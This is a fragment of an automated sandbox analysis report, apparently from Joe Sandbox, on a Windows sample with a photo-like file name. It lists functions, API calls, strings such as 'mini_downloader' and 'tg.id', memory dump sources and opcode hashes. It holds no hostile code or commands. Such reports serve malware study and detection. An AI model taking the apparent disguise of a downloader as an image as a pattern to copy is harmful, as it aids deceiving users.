                                                                  • Part of subcall function 00401A8E: std::_Xinvalid_argument.LIBCPMT ref: 00401AA7
                                                                  • Part of subcall function 00401A8E: _memmove.LIBCMT ref: 00401B02
                                                                  • Part of subcall function 00408F8D: GetTickCount.KERNEL32 ref: 00408FD3
                                                                  • Part of subcall function 00408F8D: PathFileExistsW.SHLWAPI(?,00000001), ref: 004090D8
                                                                  • Part of subcall function 00408F8D: _wcslen.LIBCMT ref: 004090ED
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                  • Part of subcall function 00402D3B: __EH_prolog3.LIBCMT ref: 00402D42
                                                                • SetTimer.USER32(?,0000000C,00001388,00000000), ref: 004060C1
                                                                  • Part of subcall function 00401478: __EH_prolog3.LIBCMT ref: 0040147F
                                                                  • Part of subcall function 004466C0: _wcslen.LIBCMT ref: 00446705
                                                                  • Part of subcall function 004466C0: _vwprintf.LIBCMT ref: 0044672D
                                                                  • Part of subcall function 004466C0: __strftime_l.LIBCMT ref: 0044675B
                                                                  • Part of subcall function 004466C0: _wcslen.LIBCMT ref: 00446768
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                  • Part of subcall function 004083B4: __EH_prolog3.LIBCMT ref: 004083BB
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                  • Part of subcall function 00412476: GetWindow.USER32(?,00000004), ref: 0041248C
                                                                  • Part of subcall function 00412476: ShowWindow.USER32(?,00000001), ref: 0041249B
                                                                  • Part of subcall function 00412476: EnableWindow.USER32(?,00000000), ref: 004124AC
                                                                  • Part of subcall function 00412476: IsWindow.USER32(?), ref: 00412526
                                                                  • Part of subcall function 00412476: EnableWindow.USER32(?,00000001), ref: 00412536
                                                                  • Part of subcall function 00412476: SetFocus.USER32(?), ref: 0041253C
                                                                  • Part of subcall function 00412476: PostQuitMessage.USER32(?), ref: 0041254D
                                                                  • Part of subcall function 00408858: __EH_prolog3.LIBCMT ref: 0040885F
                                                                  • Part of subcall function 00408858: GetTickCount.KERNEL32 ref: 00408864
                                                                  • Part of subcall function 00408858: KillTimer.USER32(?,0000000C), ref: 00408896
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3Window$_wcslen$CountEnableTickTimer_memmove$ExistsFileFocusH_prolog3_KillMessagePathPostQuitShowXinvalid_argument__strftime_l_vwprintfstd::_
                                                                • String ID: MainDlg.cpp$code:%d type:%d
                                                                • API String ID: 189137194-3394446902
                                                                • Opcode ID: 4b1dd2875200329e9e72822cef7eee9d099a2e1ed2e0af5d5218ce328d0e4fe9
                                                                • Instruction ID: bcc8781d49c6f6fee9b4999235d94affd85265196e40ce6ff852dd902bfb1491
                                                                • Opcode Fuzzy Hash: 4b1dd2875200329e9e72822cef7eee9d099a2e1ed2e0af5d5218ce328d0e4fe9
                                                                • Instruction Fuzzy Hash: AB419370900258AEDF10EBA5CC85FCE7BB4AF45304F0441AAF908BB1D2CB785A44CB65
                                                                Function 0046BA50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0046BA97
                                                                • _wcslen.LIBCMT ref: 0046BABE
                                                                  • Part of subcall function 00401741: _memmove.LIBCMT ref: 00401796
                                                                • _wcslen.LIBCMT ref: 0046BAE3
                                                                  • Part of subcall function 0047FFB0: _memmove.LIBCMT ref: 004800B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_memmove
                                                                • String ID: 1.0.2|mini_downloader
                                                                • API String ID: 1304002212-4221120243
                                                                • Opcode ID: 5745d7f1a8a448ec66e8bc4cbdf720a87bb85f4d2f6a9c990880cb61fc4b4ab4
                                                                • Instruction ID: 9955f6b14555510013ff4267447371b017ddab3dedafcaba9edd047fb284bfe8
                                                                • Opcode Fuzzy Hash: 5745d7f1a8a448ec66e8bc4cbdf720a87bb85f4d2f6a9c990880cb61fc4b4ab4
                                                                • Instruction Fuzzy Hash: F1315B71E002589BDF04EFEAD8416EEF7B5AF44708F14442FE805A7250EB796944CB99
                                                                Function 004561D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_wcslen
                                                                • String ID: ProtoValue::real wrong type$core\ProtoValue.cpp
                                                                • API String ID: 2610429163-2606871563
                                                                • Opcode ID: 5fad6cd66559bfbf7aade4b74e678a2dd13e72c73934f1155505c2e9e68860ab
                                                                • Instruction ID: 84b38b224eeae2c67f062d783c1f6ccf7ff4a3ea978def3d801a20504c6a1f24
                                                                • Opcode Fuzzy Hash: 5fad6cd66559bfbf7aade4b74e678a2dd13e72c73934f1155505c2e9e68860ab
                                                                • Instruction Fuzzy Hash: 2D316D71E042489BCB14EFAAC8816EEFBB9FF44314F50856FE819A7281DB345A05CF59
                                                                Function 00456300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_wcslen
                                                                • String ID: ProtoValue::string wrong type$core\ProtoValue.cpp
                                                                • API String ID: 2610429163-3476850260
                                                                • Opcode ID: ad6411db9341150210f688abfd3f7bff1f75c5854131a2bbc274a3fe0e0bb2cd
                                                                • Instruction ID: d95db99dd642cd40b3a9625c2e402b0202c71aee06a45c4266db1724ad8524e4
                                                                • Opcode Fuzzy Hash: ad6411db9341150210f688abfd3f7bff1f75c5854131a2bbc274a3fe0e0bb2cd
                                                                • Instruction Fuzzy Hash: 59318D70E002189BDB14DFAAC8816DEFBB5FF44314F50856FE815A7281DB345A05CF59
                                                                Function 0044C4F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: \$about_protocol
                                                                • API String ID: 176396367-3558658022
                                                                • Opcode ID: 4c66436772644fca5d61a6f7ca4168791dcfa605c1f36ad642f953657569bcc7
                                                                • Instruction ID: 853af647e62c8341ff199b612ea18f59928895aab497cf4755be57e2fba7eea8
                                                                • Opcode Fuzzy Hash: 4c66436772644fca5d61a6f7ca4168791dcfa605c1f36ad642f953657569bcc7
                                                                • Instruction Fuzzy Hash: 382175B1D14218ABDB14EF69D841A9EBBF4FF44714F004A2FF41597380D779A504CB96
                                                                Function 00408858 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CountH_prolog3KillTickTimer
                                                                • String ID: file='ad00.png'
                                                                • API String ID: 1519387226-2496299537
                                                                • Opcode ID: fc89915bd4cfe34ec7ab5e3f57b6fb3b77dac9b90b2b442eb39918d24c5b121a
                                                                • Instruction ID: 849b55fa4a1f443bc11129815091c5b05825c8c3cbd5fc1964f5cc1726afbccf
                                                                • Opcode Fuzzy Hash: fc89915bd4cfe34ec7ab5e3f57b6fb3b77dac9b90b2b442eb39918d24c5b121a
                                                                • Instruction Fuzzy Hash: 1321B4B2E04702AFDB54BF75898169DF7A4BF04300F44463FE559B7282CB7829948BD9
                                                                Function 004117BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MonitorFromWindow.USER32 ref: 004117FC
                                                                • GetMonitorInfoW.USER32(00000000), ref: 00411803
                                                                • OffsetRect.USER32(?,?,?), ref: 0041183C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Monitor$FromInfoOffsetRectWindow
                                                                • String ID: (
                                                                • API String ID: 1360704185-3887548279
                                                                • Opcode ID: b60f1607291778b2bd6dd796eaa11c51e39670c6ef9cc78bccdf7382713464bd
                                                                • Instruction ID: 7f398f791b73eaa619ad1593330b9885e8b74ab8312ffc8197410c3ada5974f9
                                                                • Opcode Fuzzy Hash: b60f1607291778b2bd6dd796eaa11c51e39670c6ef9cc78bccdf7382713464bd
                                                                • Instruction Fuzzy Hash: 3A31BEB16083019FC710CF28D885A5ABBF4FB88304F008A2EF89AC7340D770E9048BA6
                                                                Function 0043CAED Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0043314E: __EH_prolog3.LIBCMT ref: 00433155
                                                                  • Part of subcall function 0043314E: _memset.LIBCMT ref: 004331B7
                                                                • _memset.LIBCMT ref: 0043CBBF
                                                                • _memset.LIBCMT ref: 0043CC3A
                                                                • _memset.LIBCMT ref: 0043CC4C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$H_prolog3
                                                                • String ID: @N`
                                                                • API String ID: 2144794740-2895337217
                                                                • Opcode ID: dba339d5a2812ba4d173a2189286fb1edfc64ebe4f47f7875913600ab9ab9b6a
                                                                • Instruction ID: 91d397c1941651fdba8bef2d9d65a3644e180c16249d092e87970992d81d8a1e
                                                                • Opcode Fuzzy Hash: dba339d5a2812ba4d173a2189286fb1edfc64ebe4f47f7875913600ab9ab9b6a
                                                                • Instruction Fuzzy Hash: E441CDB5501B848AD3359F39C881AD3BBE4FF19314F105A2EE5AF8B690E7702145CB55
                                                                Function 0043559E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __wcsicoll
                                                                • String ID: 6*B$6*B$TreeNodeUI
                                                                • API String ID: 3832890014-2932455178
                                                                • Opcode ID: 54adc4386fe9dda2ff4a8d7c96ba72aa09e2e82f63216e8243ac54d1c1a6625b
                                                                • Instruction ID: e8feac4fc5ba857463d77535fac0943887386171a2054e4bdf055f12f4713826
                                                                • Opcode Fuzzy Hash: 54adc4386fe9dda2ff4a8d7c96ba72aa09e2e82f63216e8243ac54d1c1a6625b
                                                                • Instruction Fuzzy Hash: 36212731341E12EFCB059E25D841AAAB365BF0D324F045117EC1A9B700CB28AC12CBD9
                                                                Function 00408072 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: %s\%s$tg.id$wb+,ccs=UTF-8
                                                                • API String ID: 2427045233-1563070307
                                                                • Opcode ID: a5b898d264c4e1a16c5e02169248157465f9f83b7cf15e03e55952ffa889b18a
                                                                • Instruction ID: 7942343885545a6ff3410a4707a142e578a84427713082c3587916e03245c7a6
                                                                • Opcode Fuzzy Hash: a5b898d264c4e1a16c5e02169248157465f9f83b7cf15e03e55952ffa889b18a
                                                                • Instruction Fuzzy Hash: 1A21AE72C01208ABDF14EBE9CD829DEB7BCAF01309F55442EF50177182DB786E0987A9
                                                                Function 0046BF70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0046C009
                                                                • __CxxThrowException@8.LIBCMT ref: 0046C01E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                • String ID: 7+@$`Mc
                                                                • API String ID: 4063778783-869997565
                                                                • Opcode ID: 427598718750fe7bf03eb04664db342d17daa959cac78f13f822a6d219f8a8ca
                                                                • Instruction ID: 9739bdea35b523c0d39a1c3f811397e23a1e9ad1ccbf45fb9715f1f684652107
                                                                • Opcode Fuzzy Hash: 427598718750fe7bf03eb04664db342d17daa959cac78f13f822a6d219f8a8ca
                                                                • Instruction Fuzzy Hash: C011BFB19002499FDB10DFA9EC81A6ABBB5FB05704F40453FE825C32A1EB79A504CB91
                                                                Function 0045DCA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _sprintf.LIBCMT ref: 0045DD1C
                                                                  • Part of subcall function 0045E480: _strlen.LIBCMT ref: 0045E4B4
                                                                  • Part of subcall function 0045E480: std::exception::exception.LIBCMT ref: 0045E61D
                                                                  • Part of subcall function 0045E480: __CxxThrowException@8.LIBCMT ref: 0045E638
                                                                  • Part of subcall function 0045ED80: std::exception::exception.LIBCMT ref: 0045EE02
                                                                  • Part of subcall function 0045ED80: __CxxThrowException@8.LIBCMT ref: 0045EE1D
                                                                  • Part of subcall function 0045ED80: std::exception::exception.LIBCMT ref: 0045EE3B
                                                                  • Part of subcall function 0045ED80: __CxxThrowException@8.LIBCMT ref: 0045EE56
                                                                  • Part of subcall function 0045ED80: std::exception::exception.LIBCMT ref: 0045EE70
                                                                  • Part of subcall function 0045ED80: __CxxThrowException@8.LIBCMT ref: 0045EE8B
                                                                Strings
                                                                • finalized the digest!, xrefs: 0045DCD4
                                                                • MD5::hex_digest: Can't get digest if you haven't , xrefs: 0045DCDA
                                                                • %02x, xrefs: 0045DD16
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
